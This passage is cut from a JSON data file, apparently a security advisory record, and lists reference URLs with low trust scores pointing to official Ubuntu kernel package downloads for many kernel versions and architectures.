        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.68_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.68_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20_2.6.31-20.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-lpia_2.6.31-20.58_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.68_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
